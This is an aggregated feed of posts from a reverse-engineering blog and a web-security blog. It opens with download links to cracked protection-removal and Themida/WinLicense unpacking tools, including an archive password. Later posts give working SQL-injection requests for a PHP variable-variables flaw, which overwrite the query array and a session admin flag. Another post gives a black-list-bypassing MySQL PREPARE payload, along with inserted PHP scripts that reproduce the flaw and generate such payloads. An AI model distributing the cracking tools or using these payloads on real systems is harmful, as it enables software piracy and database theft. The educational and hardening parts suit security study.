http://reversengineering.wordpress.com/feed/ This will be a separate download of StrongOD as of version 0.2.4.350 because – as strange as it sounds – the developer has protected it! This plugin will now require a key for it to run and be used. You can obtain a valid key by emailing: StrongODsafengine.com http://letitbit.net/download/9563.9f5459d00eca80b4993740279/StrongOD_v0.2.6.415.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> PDF Protection Remover 3.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/8140.813d385e39b7bcbb34ccc58af/PDF_Protection_Remover_3.0___Patch_DJiNN.rar.html pass :www.2baksa.net Posted in TOOLS, Uncategorized

==> HOlly 0.2 Build 81

http://reversengineering.wordpress.com/feed/ This is my OllyDbg mod named HOlly. I will be constantly adding features as I require them or they are requested. Currently it only has a multiline assembler that needs some work but I would like some input. So if I could get some input on the following that would be great. http://letitbit.net/download/3997.d3730400452d29f3a615da1f7/HOlly_v0.2_Build_81.rar.html Posted in [...]

==> Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0

http://reversengineering.wordpress.com/feed/ Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0 By [SND]quosego Hi all, It’s time to make a final stand. Oreans it’s your turn now. This package includes the following; WL.&.TM.VM.dumper.&.IAT.CodeEnc.Fixer.v2.6.0-SnD A script to unpack all known versions of Winlicense and Themida using any options. The script will unpack all known Themida and Winlicense applications using virtual machine antidump on Windows XP. [...]

==> PHP, variable variables, oh my!

http://rgaucher.info/feed/rss2 I was just looking at some PHP code for one of our clients, and found a case I haven't seen many times before. I thought I should share it here. The code I was looking at looks like this:

    <?php
    // Init the PHP array with some SQL code to start the query
    $declareSQLArray = InitializedArray('stuff');

    // Use a strong enough validation routine to do the input
    // validation of POST variables
    while (list($name, $value) = each($_POST)) {
        if (!is_array($value))
            $$name = StrongValidation($value);
        else
            $$name = $value;
    }

    // Do something with my variables and always do a proper
    // validation when I use the data

    // Eventually, build my SQL command, and send this to the DB
    $sql_command = join(' ', $declareSQLArray);
    mysql_query($sql_command);
    ?>

The code, horribly constructed as it is, does not seem to show any important weakness beyond the usual one: submitting a POST variable as an array bypasses StrongValidation. Such an array value, however, would then have failed every other validation routine in the code.

Even if you are experienced with PHP, you might not have encountered variable variables before. In short, they allow you to declare named variables dynamically. Here is a simple example:

    hubert:~ Romain$ php -r '$name="foo"; $$name="Hello World!\n"; echo $foo;'
    Hello World!

Here, the variable $foo gets declared and assigned using PHP's variable variables capability.

Getting back to our code example, I'm sure the reader will spot the issue, and what an attacker can do to exploit such a scenario, in this case to trigger a SQL injection. Since the variable $declareSQLArray is defined and initialized before the POST variables lookup, it is possible to reassign it using variable variables. In that case, no validation is performed when we submit an array, and this is exactly what we want to do! To exploit the SQL injection, you only need to submit POST variables that overwrite $declareSQLArray with the content we want in it:

    POST /code_example.php HTTP/1.1
    Host: example.com
    ...

    declareSQLArray%5B%5D=SELECT...;&declareSQLArray%5B%5D=--&whatever...

Job done! The resulting SQL query will start with the payload that was submitted as part of $declareSQLArray. You've got your SQL injection.

Update: While driving back home, I was wondering if I could overwrite values from the SESSION using this technique. A couple of lines of code and a POST request later, the answer is short: YES. Imagine that you have an isadmin variable as part of the session (which is an associative array). This variable would be set in code like this:

    if ($user->isNotAdmin())
        $_SESSION['isadmin'] = 0;
    else
        $_SESSION['isadmin'] = 1;

Exploiting the previous weakness of the code example, we are able to overwrite the $_SESSION['isadmin'] content, only by supplying what will be interpreted as an associative array by PHP:

    POST /code_example.php HTTP/1.1
    Host: example.com
    ...

    _SESSION%5Bisadmin%5D=1&whatever...

I'm sure you're thinking, as I do, that this is getting more interesting! Anyway, this issue is not new at all; it is known as Dynamic Variable Evaluation (thanks to Steve Christey). The interesting part is that DAST won't be able to detect it (or maybe, if you are lucky enough), and it is very hard for a SAST to deal with (actually, I doubt any SAST vendor who supports PHP handles this case, but it's not impossible since they have all they need to solve the problem).

Update 2: Based on the comments, I did some testing and observed that even if we can overwrite data from the session, this data does not get persisted in the session. This means that you can still control a value from a superglobal for the remaining execution of the script, but cannot persist the data.
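The following is an added example, not code from the post: the post's POST-registration loop placed in a function next to an allow-listed rewrite, both run from the command line on a constructed array that stands in for $_POST, so the $declareSQLArray overwrite can be reproduced without a web server. StrongValidation() is the post's name for a hypothetical routine; its body here (keep alphanumerics only), the seeded query fragments and the field name id are assumptions. The $_SESSION overwrite from the update is not reproduced, because variable variables do not reach the superglobals from inside a function; that part of the post only works at file scope, as in the original code.

```php
<?php
// Added example, not the code from the post: the post's POST-registration
// loop next to an allow-listed version, both run on a constructed array that
// stands in for $_POST, so the $declareSQLArray overwrite can be reproduced
// from the CLI (`php vv_demo.php`) without a web server.
// StrongValidation() is the post's hypothetical routine; the body below
// (keep alphanumerics only) and the seeded query fragments are assumptions.

declare(strict_types=1);

function StrongValidation(string $value): string
{
    return preg_replace('/[^A-Za-z0-9_]/', '', $value);
}

// Vulnerable, mirroring the post: $declareSQLArray is seeded first, then
// every POST key becomes a local variable through $$name. Scalars are
// validated, arrays are copied untouched, so an array named
// declareSQLArray silently replaces the seeded fragments.
function buildQueryVulnerable(array $post): string
{
    $declareSQLArray = ['SELECT', 'name', 'FROM', 'items', 'WHERE', 'id', '='];

    foreach ($post as $name => $value) {
        if (!is_array($value)) {
            $$name = StrongValidation($value);
        } else {
            $$name = $value;              // no validation at all
        }
    }
    if (isset($id)) {                     // $id only exists if the loop created it
        $declareSQLArray[] = $id;
    }
    return implode(' ', $declareSQLArray);
}

// Hardened: no variable variables. Only the fields this page expects are
// read, array-valued ones are rejected, and the value is returned as a bind
// parameter for a prepared statement instead of being spliced into the SQL.
function buildQueryHardened(array $post): array
{
    $sql      = 'SELECT name FROM items WHERE id = ?';
    $expected = ['id'];                   // allow-list of POST fields
    $params   = [];

    foreach ($expected as $name) {
        if (!isset($post[$name]) || !is_string($post[$name])) {
            throw new InvalidArgumentException("missing or non-scalar field: $name");
        }
        $params[] = StrongValidation($post[$name]);
    }
    return [$sql, $params];
}

// Constructed attacker body: the URL-decoded form of the post's
// declareSQLArray%5B%5D=...&... request, plus a legitimate id field.
$attack = [
    'declareSQLArray' => ['SELECT', 'password', 'FROM', 'users', '--'],
    'id'              => '42',
];

echo "vulnerable: ", buildQueryVulnerable($attack), PHP_EOL;

[$sql, $params] = buildQueryHardened($attack);
echo "hardened:   ", $sql, " with ", json_encode($params), PHP_EOL;

try {
    buildQueryHardened(['id' => ['1', '2']]);   // array where a scalar is expected
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected (", $e->getMessage(), ")", PHP_EOL;
}
```

The vulnerable function returns the attacker's SELECT with the seeded query gone entirely, which is the point of the post: StrongValidation never ran on the array, and even if it had, the damage is done by the assignment, not by the value. The hardened version has no $$ at all, so the set of variables a request can create is fixed by the allow-list; rejecting non-string values closes the array bypass, and binding the value as a parameter means it can only ever be data.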

==> Dissection of a SQL injection challenge

http://rgaucher.info/feed/rss2 As part of the SQL injection challenges that I developed (focusing on MySQL), one of the classic challenges (we have the same types for XSS) is a simple, yet disturbing for juniors, black-list with a few controls such as partial output encoding. In the case of SQLi, I decided to black-list the following keywords (as seen during an assessment):

    select, union, drop, delete, insert, and, or, where, update, if, not

On top of this, I use the mysqli function that properly escapes strings (mysqli_real_escape_string), and I remove all white-space. The SQL command goes through a driver that is aware of multiple queries (i.e., you can stack queries), and the injection context is fairly simple; we have something like this:

    SELECT username FROM users WHERE userid=<<HERE>>

Since this is an *exploitation* challenge, the goal is to extract the password of a given user from this database. Now, every time that I write a challenge, I first come up with the application and I need to break it afterwards to make sure that there is a solution (unless the challenge is derived from what I already found in one of my previous assessments). Anyway, here my main personal challenge was to come up with a query that would retrieve the proper data without using one of the black-listed keywords. Spaces and quotes are easy not to care about: simply use /**/ as a word separator, and use the hexadecimal representation of strings so that we make sure not to use single quotes & co. Here is a quick summary with 2 similar queries:

    * Spaces bypass: select/**/foobar/**/FROM/**/table/**/WHERE/**/user='c3';
    * Single quotes:  select foobar FROM table WHERE user=0x6333;

The way I found to solve this challenge is to use MySQL prepared statements. However, I was fairly disturbed at first since I cannot use the following syntax in MySQL:

    PREPARE st FROM 0x73656c656374202a2066726f6d207573657273;
    EXECUTE st;
    DEALLOCATE PREPARE st;

where 0x73656c656374202a2066726f6d207573657273 contains the query to get everything from the users table (i.e., select * from users). The syntax of the PREPARE keyword is not flexible like any other string manipulation in MySQL, and does not allow strings in their hexadecimal representation. The gotcha here (I wouldn't call this a trick) is to use a temporary variable assignment, and use this variable in the PREPARE construct. The final construct I used is the following:

    SET @v=0x73656c656374202a2066726f6d207573657273;
    PREPARE st FROM @v;
    EXECUTE st;
    DEALLOCATE PREPARE st;

Now, putting the pieces together, and adding this into our original query, we get a payload similar to this:

    9999||username=0xdeadbeef;SET/**/@s=0x73656c656374202a2066726f6d207573657273;PREPARE/**/ss/**/FROM/**/@s;EXECUTE/**/ss;DEALLOCATE/**/PREPARE/**/ss;#

This construct is very similar to the solution of the challenge, but not exactly the same since we need to use the application to display the data. Therefore, in that case we need to make sure that the prepared statement returns only one column, etc. Anyway, I wanted to share this since I haven't come across many references that talked about using prepared statements as SQL injection payloads...
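As an added example (not from the post, and not the challenge's own code), the PHP script below builds the PREPARE-based payload described above for an arbitrary inner query and then runs it through a reconstruction of the challenge's three filters: the keyword black-list, string escaping, and white-space removal. Two details are assumptions because the post does not state them: the black-list is matched as case-insensitive substrings (the stricter reading), and addcslashes() with the characters mysqli_real_escape_string() escapes stands in for that function, since there is no database connection. The column name password is also assumed.

```php
<?php
// Added example, not from the post or the challenge: builds the
// PREPARE-based payload described above for any inner query and checks it
// against a reconstruction of the challenge's filters. Run: `php payload.php`.
// Assumptions: the black-list is matched as case-insensitive substrings
// (stricter than whole words) and addcslashes() stands in for
// mysqli_real_escape_string() since there is no database connection.

declare(strict_types=1);

const BLACKLIST = ['select', 'union', 'drop', 'delete', 'insert', 'and', 'or',
                   'where', 'update', 'if', 'not'];

// MySQL hex string literal: 'select * from users' -> 0x73656c6563...
function hexLiteral(string $s): string
{
    return '0x' . bin2hex($s);
}

// Stacked-query payload for the numeric context `WHERE userid=<<HERE>>`.
// The inner query travels as a hex literal, so none of its keywords appear
// in clear text; spaces are written as /**/ so white-space removal has
// nothing to strip; '#' comments out whatever the application appends.
function buildPayload(string $innerQuery, string $var = '@s', string $stmt = 'ss'): string
{
    $pieces = [
        '9999',                                  // close the numeric context
        ';SET ' . $var . '=' . hexLiteral($innerQuery),
        ';PREPARE ' . $stmt . ' FROM ' . $var,
        ';EXECUTE ' . $stmt,
        ';DEALLOCATE PREPARE ' . $stmt,
        ';#',
    ];
    return str_replace(' ', '/**/', implode('', $pieces));
}

// The challenge's filters as the post lists them: escaping, white-space
// removal, keyword black-list. Returns what reaches the query plus which
// keywords (if any) would have blocked it.
function applyFilters(string $input): array
{
    $escaped  = addcslashes($input, "\0\n\r\\'\"\x1a");   // stand-in for mysqli_real_escape_string
    $squeezed = preg_replace('/\s+/', '', $escaped);
    $hits     = [];
    foreach (BLACKLIST as $kw) {
        if (stripos($squeezed, $kw) !== false) {
            $hits[] = $kw;
        }
    }
    return ['query' => $squeezed, 'blocked_by' => $hits, 'mangled' => $squeezed !== $input];
}

// What the challenge asks for; the password column name is an assumption.
$inner   = 'select password from users';
$payload = buildPayload($inner);
$result  = applyFilters($payload);

echo "payload : ", $payload, PHP_EOL;
echo "blocked : ", $result['blocked_by'] ? implode(',', $result['blocked_by']) : 'none', PHP_EOL;
echo "mangled : ", $result['mangled'] ? 'yes' : 'no', PHP_EOL;
echo "context : SELECT username FROM users WHERE userid=", $result['query'], PHP_EOL;
echo "prepared: ", hex2bin(substr(hexLiteral($inner), 2)), PHP_EOL;   // what MySQL actually runs

// The same inner query in clear text, for contrast: the black-list catches it.
$naive = applyFilters('9999;' . $inner . ';#');
echo "naive   : blocked by ", implode(',', $naive['blocked_by']), PHP_EOL;
```

The "prepared" line is the statement the server's MySQL ends up executing, and the black-list never sees a byte of it: the keywords reach the query text only through a hex literal, a user variable and comment tokens, which is why the clear-text variant is blocked while the PREPARE variant goes through untouched. The defence is not a longer list. Bind userid as an integer parameter in an application-side prepared statement, and do not execute user-influenced input through a multi-statement API such as mysqli_multi_query(), since the stacked SET/PREPARE/EXECUTE sequence depends on that.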

==> WASC Threat Classification 2 - Wordle

http://rgaucher.info/feed/rss2 I just dig that image out; I made it for the release of the WASC Threat Classification 2.0

==> Yes, we need a standard to evaluate SAST, but it ain't easy...

http://rgaucher.info/feed/rss2 In reply to Dinis's blog post: The Need for Standards to evaluate Static Analysis Tools

1. You unfortunately list only a few types of SAST. Many tools don't implement taint analysis: if you go into the Ada/C/C++ world, you won't see much taint-based analysis, but rather other techniques such as symbolic execution (Grammatech), abstract interpretation (ASTREE, PolySpace, etc.), and more. A list of SAST can be found on the NIST SAMATE website: List of Source Code Security Analyzers

2. As said on twitter, concerning the WASSEC, I don't believe it's important to have a public evaluation of commercial/open-source tools. Also, WASSEC lists some vulnerabilities that the tool should look for, but we don't provide test cases, so it's not really possible to claim that a tool effectively tests for a given problem. E.g., the difference between two tools:
* one only tests XSS with a few payloads and does regexp matching of the rendered HTML;
* a smarter engine automagically crafts attacks and looks at the resulting HTML with a JS engine (or so, which leads to fewer FP).
Depending on who you are and what you want, you might very well say that those two tools have the same support for XSS... Moreover, tools are changing so quickly that an evaluation would only be accurate at the time you make it.

3. NIST SATE is literally an exposition. NIST chooses test cases (real open-source programs that cover different types of functionality and technology) and asks tool makers to run their SAST on those programs. The goal isn't to compare the tools in order to claim that one is better than another for a type of technology, but to see how tools (in general) perform, how many types of weaknesses the tools find, and also what the overlap of tool findings is (which turned out to be a very small number of findings).

More generally, as Andrew said, a SAST isn't only an analysis engine that finds weaknesses in a program; it's a suite of functionalities:
* supported technologies
* letting users develop custom checks (or custom rules)
* displaying the weaknesses to the user (allowing them to rank/prune, and explaining the problem) and reporting capabilities
Ultimately, every one of those elements is important and needs to be tested, but again, the importance of each depends on who you are and how you want to use the SAST (from a simple compliance type of scan to exhaustive security testing). Just to tell you, NIST SAMATE (organizers of SATE) have been thinking a lot about those problems and there is no easy solution for evaluating SAST... But the last SATE report explains some of the problems we (I was part of the SAMATE team at the time) faced: SATE 2008 - NIST Special Publication 500-279

==> Data driven factory: I give you data, you give me an object...

http://rgaucher.info/feed/rss2 I've been working on a data warehouse project lately, in Python, to support different kinds of data analysis I am developing as part of my current work. I decided to use SQLAlchemy as the ORM; I can then quickly move from my development version using an SQLite database to production, using MySQL or MSSQL databases. SQLAlchemy is also one of those amazing ORMs that support sharding; it's hardly necessary to say how important that is when you develop a tool that will import, format, process and analyze gigabytes of data. Also, working with a lot of data types, to register them into my ORM instance and to persist them into a database, I need my software to be able to quickly generate an object representing the data type: a particular instance of the object. Developers usually create factories in order to create instances of objects. The main idea is to delegate the instantiation of the object to a third-party object. In most factories, we specify a type of object that we want to create: give me an instance of a pizza with mushrooms, tomatoes and ham. This last point, asking for a particular type (or sub-type) of object, was the main limitation for my use. In fact, most of my types are related in some way, but without strong inheritance (Dish > Pie > Pizza); another important point is the maintainability of code where I would have to list all the different types of object my factory needs to create... Well, I wanted something more generic: a data driven factory. The data driven factory is a factory that, based on the data sent to the factory object constructor, will produce an instance. A simple example would be to get an instance of a Margherita pizza when given certain ingredients (tomatoes, mozzarella and parmesan), or a Neapolitan if I add anchovies. This type of factory, which depends only on the data given as parameters, is possible in Python by using the class inspection capabilities of the language.

In fact, the implementation I propose requires registering each class to be constructed with the factory; the constructor arguments (and default arguments) are analyzed for a matcher later on, and you pass the "type" of each data field (basically, the argument names); the factory then gets the appropriate object for you. Side note: the factory returns the class rather than an instance for performance reasons. In fact, I get the class from the factory, store it and loop through the instantiation with millions of data items. Example of use:

    class Shape(object):
        pass

    class Circle(Shape):
        def __init__(self, center, radius=RAD_MAX):
            pass  # body elided in the post

    class DiskHole(Shape):
        def __init__(self, center, radius, small_radius=RAD_SMALL):
            pass  # body elided in the post

    factory = DDFactory()
    factory.register(Shape)
    factory.register(Circle)
    factory.register(DiskHole)

    print factory.get(['center', 'radius'])
    #> returns the 'Circle' ctor
    print factory.get(['center', 'radius', 'small_radius'])
    #> returns the 'DiskHole' ctor

You can access this factory here: dd_factory.py. In the distributed code, I assume that each object to create has a __tablename__ class member that tells which database table is the eventual target (which is my case using SQLAlchemy / declarative objects). This is easy to change by replacing the factory's register method with something like this:

    def register(self, cls):
        # Only classes with a constructor are registered; the argument names
        # and defaults are what get() later matches the data fields against
        if hasattr(cls, '__init__'):
            s_cls = str(cls)
            args, defaults_dict = DDFactory.defaults_values(cls)
            if s_cls not in self.registrar:
                self.registrar[s_cls] = {'class': cls, 'args': args, 'defaults': defaults_dict}

==> NIST Static Analysis Tool Exposition special publication released

http://rgaucher.info/feed/rss2 "The NIST SAMATE project conducted the first Static Analysis Tool Exposition (SATE) in 2008 to advance research in static analysis tools that find security defects in source code. The main goals of SATE were to enable empirical research based on large test sets and to encourage improvement and speed adoption of tools. The exposition was planned to be an annual event." SATE 2008 was one of my last projects at NIST. I really enjoyed working on this project from the beginning; it was challenging, especially because we had to create so many artifacts to make the tools report the weaknesses the same way, integrate them all together and provide ways for assessors to make meaningful reviews. In a nutshell, we selected 6 different open-source programs (3 in C, 3 in Java) and had tool vendors run their tool on these test cases. Tool vendors were allowed to customize their tool if it provides such a capability. Fortify was the only vendor who created a custom rule (to help the tool with a validation routine for MVNForum). Our goal was then to combine all the results together and analyze them: provide information on the correctness of the tools. If you are interested, you can download the SATE data and the NIST SATE Special Publication. Thanks to all the SAMATE team for this effort, and especially Vadim Okun and Paul E. Black. For more information, you can reach the SATE page at NIST.

==> HTML 5 current browsers implementation support

http://rgaucher.info/feed/rss2 Firefox 3.1beta has been released today, with support for two HTML 5 elements: audio and video. Gareth and I exchanged some messages on twitter about the current support of HTML 5 by the different engines. The first document I found (well, by asking on the #whatwg IRC channel) is the Comparison of layout engines you can find on Wikipedia; they also pointed me to a wiki that WhatWG maintains: Implementations in Web browsers. These are pretty incomplete documents, so I decided to create a mapping between the current WhatWG document and the support of the browsers. This is possible because in the current document they report the implementation status of the different items. Anyway, here is a table I assembled, containing the latest information about the HTML5 implementations in the current browser engines. I also want to say that even if the WASC Script Mapping project has looked quite inactive for some time now, I will definitely continue it. I'm actually waiting to finish a couple of other projects I participate in, especially the WASC Threat Classification 2 and the Web Application Security Scanner Evaluation Criteria. I expect to get started again on Script Mapping during this summer... EDIT: I will maintain the current list of HTML5 implementations in current browsers: HTML5. March 30. + twitter is quite cool to follow/interact, feel free to follow me at @rgaucher

==> SHA-3 reference implementations buffer overflows

http://rgaucher.info/feed/rss2 Fortify just posted a nice blog post about the audit they did on several reference implementations that compete to become the next NIST SHA-3. They do not release much information on their findings: only one is described. I would have really liked to see how powerful the analysis was (if it was) at finding these problems. It would be nice too to see other tool vendors, such as Grammatech, Klocwork, Coverity, etc., do the same, and then start another competition ;) I'd really like to emphasize the conclusions in Fortify's blog post: "Reference implementations don't disappear, they serve as a starting point for future implementations or are used directly. A bug in the RSA reference implementation was responsible for vulnerabilities in OpenSSL and two separate SSH implementations. They can also be used to design hardware implementations, using buffer sizes to decide how much silicon should be used. The other consideration is speed, which will be a factor in the choice of algorithm. The fix for the MD6 buffer issues was to double the size of a buffer, which could degrade the performance. On the other hand, memory leaks could slow an implementation. A correct implementation is an accurate implementation."

==> When CAPTCHA fails...

http://rgaucher.info/feed/rss2 Some time ago, I was amazed by the difficulty of a CAPTCHA implemented by rapidshare. Well, today I came across one which is even worse. We all know that using a CAPTCHA is very bad from a usability point of view, but without them, spammers would easily add junk to your database. But it's even worse when the CAPTCHA software is not working properly... Sure, you won't get any spammers here... nor regular users. Just to avoid confusion or misinterpretation: even if you refresh/clear cache/etc., you will get this message. And no, 'ERROR' is not the solution of the CAPTCHA. Hope that phishtank will fix that soon... We see many different CAPTCHAs on the web, some good, some not. I do not know why people keep developing their own simplistic CAPTCHAs when there is a good service like the one provided by reCAPTCHA. This CAPTCHA is pretty solid and also adds an audio version (way better for accessibility).

==> CIA spamming security groups: Be a part of a mission that’s larger than all of us.

http://rgaucher.info/feed/rss2 "Hello Romain, The Central Intelligence Agency would like you to consider a career with the National Clandestine Service. The CIA's National Clandestine Service seeks qualified applicants to serve our country's mission abroad. Our careers offer rewarding, fast-paced, and high impact challenges in intelligence collection on issues of critical importance to US national security. Applicants should possess a high degree of personal integrity, strong interpersonal skills, and good written and oral communication skills. We welcome applicants from various academic and professional backgrounds. Do you want to make a difference for your country? Are you ready for a challenge? All applicants for National Clandestine Service positions must successfully undergo several personal interviews, medical and psychological exams, aptitude testing, a polygraph interview, and a background investigation. Following entry on duty, candidates will undergo extensive training. US citizenship required. An equal opportunity employer and a drug-free work force. For more information and to apply, visit: www.cia.gov You can make a world of difference." Com'on guys, I'm not even a US citizen... So yeah, the CIA is looking for security guys by spamming LinkedIn groups. Anything wrong in that process?

==> SSL Fails! SSLFail.com

http://rgaucher.info/feed/rss2 Marcin and Tyler just started a new website, which is kind of fun: sslfail.com (a wall of shame for SSL certificates?). So now, Google & co., fix your certificates :P

==> Every-day's CSRF: Sorry, I turned off your christmas tree lights

http://rgaucher.info/feed/rss2 Today, a friend of mine was really proud to show me the home automation installation he just bought. Well, since he lives in France and I am in DC, he showed me the web interface that was able to control the lights etc. in his house. As he wanted to test this domotic system, he only plugged his Christmas tree lights into the system. Well, maybe I'm only seeing bad stuff around me, but... déformation professionnelle, we'll say! It was so easy to make it blink with a simple script that I showed it to him. So, every 5 seconds, it would change the state. Anyway, this CSRF is not a big deal for him since it's only the Christmas tree lights, it's only a temporary installation and well, it's fun. But after a simple Google search, I found another site like my friend's. The URL that Google returns is: http://XXX.XXX.XXX.XXX:88/control_exe.htm;3;1;ON which is basically turning on some device... :) Also, not only does this application have tons of CSRF, it also has a nice stored XSS which lets you do whatever you want with it! And btw, since the Google robot reported this, it means that every time it crawls the website (or at least reaches that particular URL), it will set the device ON :) Web security enters your house, f34rs!

==> IE7, no Same Origin Policy when the script/file is on your file system

http://rgaucher.info/feed/rss2 It's been such a long time since I last posted here. I've been quite busy with the new job at Cigital and everything it implies. Anyway, this morning, a colleague of mine showed me a piece of JavaScript he used to create a request to another website (actually, this was just to do in JavaScript what I did in Python previously). This totally bugged me. He had been able to craft a request (using XHR) from a local file to a remote website... WTF with SOP? After some tests, it seems it's only working with IE7, but well, I didn't test with many browsers, only with Firefox 3, Chrome and IE7. So, I have no idea if this has been known for a long time or not, but well, I haven't seen this before. A simple POC is available here: xhr_SOP_ie7.html

==> Internet User Privacy Values Survey

http://rgaucher.info/feed/rss2 I know how tough and crucial it is to get participants for a survey, so it would be great if you guys could take this and spread it a little bit more... Researchers at ThePrivacyPlace.Org are conducting an online survey about privacy policies and user values. The survey is supported by an NSF ITR grant (National Science Foundation Information Technology Research) and was first offered in 2002. We are offering the survey again in 2008 to reveal how user values have changed over the intervening years. The survey results will help organizations ensure their website privacy practices are aligned with current consumer values. The URL is: http://theprivacyplace.org/currentsurvey We need to attract several thousand respondents, and would be most appreciative if you would consider helping us get the word out about the survey, which takes about 5 to 10 minutes to complete. The results will be made available via our project website (http://www.theprivacyplace.org/). Prizes include $100 Amazon.com gift certificates sponsored by Intel Co. and gifts from IBM and Blue Cross and Blue Shield of North Carolina. On behalf of the research staff at ThePrivacyPlace.Org, thank you!

==> Last week at NIST

http://rgaucher.info/feed/rss2 All good things come to an end... this is the time for me to leave NIST. I will be a security consultant at Cigital, Inc. I've been working at NIST for two and a half years as a Guest Researcher in the SAMATE project. I originally came to NIST to do mostly statistical analysis or so, but it changed a lot! I started by building the SAMATE Reference Dataset website and this is how I started to learn about "security", by working with flawed source code. This was very obscure to me (I guess like every computer scientist specialized in applied mathematics) and I learned a lot about weaknesses, vulnerabilities, "how to find them?", scanners, etc. My first real security related work was on the Web Application Security Scanner Specification and then on designing a way of testing web application scanners:
* a test suite with seeded vulnerabilities
* checking the types of attacks
* trying to explain the false negatives of the tools by monitoring what/where the scanner went in the application at a logical level, such as "did the tool log in successfully? did it generate a couple of errors? did it try many times?"
The goal of this three-component analysis is to really be able to understand what the tool is doing, and if it didn't find a particular vulnerability, why. One of the best moments I had at NIST was when we did the Static Analysis Tool Exposition. I was part of the organizers and from the beginning it was a real challenge: choosing good test cases, criteria to evaluate the reports, etc. Of course, SATE 2008 was not perfect, we made many mistakes, but at least we tried, we had some results and we learned a lot. I have good hopes for the next SATE, even though this is really challenging on many aspects:
1. Not making people think/act like this is a competition (we sometimes see people claiming they won SATE 2008, but... well, there would be many things to say to them)
2. Having strong evaluation criteria (I guess this is challenging every time human assessment is part of the game)
3. Solving the way to present data to the evaluators. We couldn't have the GUI of the tools etc., so our analysis (as an evaluator) was really limited and we sometimes had to guess what the exact weakness report was
4. And finally, having more resources and help for evaluating the weaknesses reported by the tools (47k this year, one month to evaluate...)
Oh well, I will of course continue to follow what the SAMATE team is doing, even though I will be away and busy with other interesting stuff, and I'm really looking forward to seeing the results of the current study we are running on function-wise weakness characterization. But for now, it's time for me to get some vacation, going back to France for almost one month, getting my work visa, etc.

==> Scalp 0.4: apache log based attack analyzer, updated

http://rgaucher.info/feed/rss2 Some time ago, I released a first version of a tool named Scalp. The tool analyzes the Apache HTTPD logs in order to examine whether there were attacks or not. The attack detection is based on the rules provided by the PHP-IDS project. Today, I took time to finalize the Python version of Scalp a bit more. Version 0.4 can now be downloaded from the project web page. This version includes a couple of features such as:
* Output in HTML, XML or TEXT format
* Specify the output directory
* Using a random sample for scanning the log file
* Trying to decode the potential attack vectors
* Returning the lines that couldn't be examined
And then, with some other options that already existed in the previous versions,
* Select a time frame
* Select classes of potential attacks
the tool seems to approach a final version. I won't add more to it since I want to keep it simple and quite fast (I may add optimizations if I find some). Also, the C++ version is on its way and mostly done with the same set of options; the code can be checked out from the Google Code repository, but I still have to work on options and time-frame specification. Scalp 0.4:
* HTML report example
* Download the python script

==> PyQt and WebKit integration: unexpected limitation [fixed]

http://rgaucher.info/feed/rss2 For those who don't know Qt, this is a huge and mature framework for developing GUIs & more on different platforms (read: multi-platform). I already did some development using Qt and C++ (especially when I was working at GERAD). As Marcin and I wanted to have a look at some technologies that involve a browser etc., I decided to look at Qt and the almost-fresh WebKit integration. The integration of WebKit in a framework like Qt allows the developer to embed, supposedly in an easy manner, a browser that supports the basic web technologies, HTML, CSS and JavaScript, in their application (it seems that Flash is going to be supported soon, and anyway, one can write one's own plugin in order to interact with some specific content). And indeed it is easy... I used PyQt in order to develop a very simple prototype and see what we are able to do with this new technology. As I already know Python and Qt, it was easy for me to start and be kind of effective. So, in a few hours of work, documentation reading and trying to understand why and how the Python version of Qt was using such or such thing compared to the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, viewing the source, and a simple encoding converter (click on the image to see the full screenshot): At this point, I was actually very excited: less than 500 lines of Python to create that... it was worth a few days of work to create a useful tool, the Swiss Army Knife of the pen-test. My next and logical step was to extend the current tool to have Tamper Data-like capabilities (e.g. being able to hijack the HTTP request and then tamper with the GET/POST data). And here come the problems... it's apparently not possible to get the current request and then reply when using the WebKit widget in Qt (QWebView).
I tried to use a delegate QNetworkAccessManager in order to override the POST/GET requests, since this object is used to set the proxies etc., but nothing... I think they just didn't open this possibility for some reason. Oh well, I then stopped developing this prototype and will try to contact Qt experts/developers just to figure out if there is no other way to do it. I thought of a solution which would be to have my own HTTP manager using QHttp in order to do the request, get the response etc. and then send the content to the browser; this would be great in a web apps scanner, but for the use I wanted, that would create huge limitations for the user interaction and especially for Ajax applications. So, the prototype stays here until I find a solution or Qt opens their network management under the QWebView widget... Fixed: An update to let you know that I actually fixed the problem; it was really stupid of me, but I should really check whether a method is virtual or not before overriding it :/ shame on me! So now, I am able to have a Firefox/Tamper Data/Firebug in one tool :)

==> And so you wanted to protect your email address on your website...

http://rgaucher.info/feed/rss2 People start thinking about how to prevent spam when they're building a website, that's a fact and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page... For instance, I was surfing on qik.com and saw this little piece of JavaScript meant to protect the email address from exposure:
  <script type="text/javascript">
  //<![CDATA[
  document.write('<a href="mailto:XXXX@qik.com"\
  title="Send us an email!">XXXX@qik.com<\/a>');
  //]]>
  </script>
As the readers of this blog may know, the bot process is really easy... download the HTML page (crawling) and then try to extract the email addresses (parsing). It is just obvious that a bot wouldn't bother with the CDATA tag or with the fact that this is embedded in JavaScript code; if I had to write a bot, I would have a very lossy parser in order to gather as much information as possible, and I wouldn't care about "in which context am I?". Also, according to some testing I'm doing, I can tell you that if this were a URL, the Google bots would get it... So please, obfuscate this just a bit... some examples can be found on fuckthespam.com

==> Why the "line of code" is indeed a good metric

http://rgaucher.info/feed/rss2 When I first learned about source code metrics, I was amazed that people used the line of code for comparing software. For me it was a lack of imagination. At the beginning of the week, I started a small and fast experiment: extracting metrics from the SATE 2008 test cases. This experiment focuses on function-wise properties and therefore I have to extract a couple of metrics for each function:
* McCabe's cyclomatic complexity, which computes the code complexity; this is indeed a good metric to estimate the difficulty a human will have to understand a given piece of code (very important for security related problems)
* Lines of code
* Lines of comments
* Number of local variables
* Number of parameters (which represents the coupling between the function and the whole program)
* Number of function calls
* Number of functions that are ``sources''
* Number of functions that are ``sinks''
* Number of C standard functions (obviously, only for C test cases)
